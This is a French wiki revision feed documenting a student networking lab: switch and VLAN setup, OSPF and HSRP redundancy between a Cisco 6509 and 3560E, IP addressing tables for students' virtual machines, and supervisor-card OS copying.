Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52541</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52541"/>
				<updated>2020-10-02T15:55:20Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&lt;br /&gt;
== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs &lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52540</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52540"/>
				<updated>2020-10-01T10:24:19Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* configuration 3560E */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs &lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52479</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52479"/>
				<updated>2020-09-26T07:31:17Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* configuration 3560E */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52466</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52466"/>
				<updated>2020-09-25T09:05:31Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* test */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== configuration 3560E ==&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52464</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52464"/>
				<updated>2020-09-25T08:55:16Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== test ==&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52463</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52463"/>
				<updated>2020-09-25T08:52:48Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : Page créée avec « zedrfghj »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;zedrfghj&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52462</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52462"/>
				<updated>2020-09-25T08:48:23Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table du vlan2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.161&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.162&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.163&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.164&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.165&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.166&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.167&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.169&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.170&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.171&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.172&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.173&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan130 ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|1192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table des vlan ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom !! Vlan &lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|Vlan3&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|Vlan4&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|Vlan5&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|Vlan6&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|Vlan8&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|Vlan9&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|Vlan10&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|Vlan11&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52461</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52461"/>
				<updated>2020-09-25T08:44:17Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table d'adressage IP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan130 ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|1192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table des vlan ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom !! Vlan &lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|Vlan3&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|Vlan4&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|Vlan5&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|Vlan6&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|Vlan8&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|Vlan9&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|Vlan10&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|Vlan11&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
